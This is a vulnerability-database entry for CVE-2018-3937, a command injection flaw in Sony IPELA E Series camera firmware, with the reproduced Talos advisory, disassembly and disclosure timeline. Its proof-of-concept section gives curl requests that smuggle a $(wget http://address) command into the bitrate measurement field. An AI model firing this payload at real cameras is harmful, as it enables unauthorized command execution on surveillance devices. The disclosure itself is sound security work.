Vulnerabilities > CVE-2018-3937 - OS Command Injection vulnerability in Sony products

047910
CVSS 6.5 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
sony
CWE-78
NVD
Published: 2018-08-14
Updated: 2022-04-19

Summary

An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera G5 firmware 1.87.00. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability.

Vulnerable Configurations

Part Description Count
OS
Sony
14
Hardware
Sony
14

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Command Delimiters
    An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
  • Exploiting Multiple Input Interpretation Layers
    An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
  • Argument Injection
    An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
  • OS Command Injection
    In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

Seebug

bulletinFamilyexploit
description### Summary An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. ### Tested Versions Sony IPELA E series G5 firmware 1.87.00 ### Product URLs Firmware ### CVSSv3 Score 9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H ### CWE CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') ### Details Sony IPELA Cameras are network facing cameras used for monitoring and surveillance. In order to measure network performance, the camera leverages iperf. While building the iperf command, a specific payload can be sent to the main.cgi in order to turn on performance measuring for UDP or TCP traffic: ``` measurement=bitrate,client,8.8.8.8,udp,123 measurement=bitrate,client,8.8.8.8,tcp,123 ``` This string is parsed by main.cgi by finding the client substring and splitting at the comma: ``` 0x0000aa48 0400a0e1 mov r0, r4 ; Input String 0x0000aa4c cc159fe5 ldr r1, [pc, 0x5cc] ; [0xb020:4]=0xd298 str.client 0x0000aa50 0620a0e3 mov r2, 6 0x0000aa54 a9fdffeb bl sym.imp.strncasecmp 0x0000aa58 000050e3 cmp r0, 0 0x0000aa5c acffff1a bne 0xa914 0x0000aa60 0400a0e1 mov r0, r4 0x0000aa64 0710a0e1 mov r1, r7 0x0000aa68 2c20a0e3 mov r2, 0x2c ; ',' 0x0000aa6c c4fdffeb bl sym.g5::libcgi::LibCGI::split_element ``` Subsequently, parsing the server address is done by using find to locate the next comma and extracting the string between the comma after client. ``` 0x0000aa98 0400a0e1 mov r0, r4 0x0000aa9c 0c3086e2 add r3, r6, 0xc 0x0000aaa0 94308de5 str r3, [sp, 0x94] 0x0000aaa4 7c159fe5 ldr r1, [pc, 0x57c] ; [0xb028:4]=0xd2a0 "," 0x0000aaa8 0020a0e3 mov r2, 0 0x0000aaac 0130a0e3 mov r3, 1 0x0000aab0 71fdffeb bl sym.std::string::find ; Find the comma after the server address 0x0000aab4 010070e3 cmn r0, 1 0x0000aab8 0040a0e1 mov r4, r0 0x0000aabc 3e00000a beq 0xabbc 0x0000aac0 90508de2 add r5, sp, 0x90 0x0000aac4 0500a0e1 mov r0, r5 0x0000aac8 98109de5 ldr r1, [sp, 0x98] 0x0000aacc a6208de2 add r2, sp, 0xa6 0x0000aad0 7efdffeb bl sym.std::basic_string_char_std::char_traits_char__std::allocator_char__::basic_string 0x0000aad4 0510a0e1 mov r1, r5 0x0000aad8 0430a0e1 mov r3, r4 0x0000aadc 94008de2 add r0, sp, 0x94 0x0000aae0 0020a0e3 mov r2, 0 0x0000aae4 73fdffeb bl sym.std::string::append ``` The above parsing results in the following commands: ``` UDP: sh -c /usr/local/bin/iperf -c 8.8.8.8 -u -b 123K -x CD > /dev/null & TCP: /usr/local/bin/iperf -c 8.8.8.8 -F /tmp/MeasurementBitrateData -n 1 > /dev/null & ``` While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address. ### Exploit Proof of Concept ``` UDP: curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),udp,123" http://camera-address/command/main.cgi TCP: curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),tcp,123" http://camera-address/command/main.cgi ``` ### Timeline * 2018-06-04 - Vendor disclosure * 2018-07-19 - Vendor patched * 2018-07-20 - Public release
idSSV:97429
last seen2018-07-25
modified2018-07-24
published2018-07-24
reporterKnownsec
titleSony IPELA E Series Camera measurementBitrateExec command injection vulnerability(CVE-2018-3937)

Talos

idTALOS-2018-0604
last seen2019-05-29
published2018-07-20
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0604
titleSony IPELA E Series Camera measurementBitrateExec command injection vulnerability

References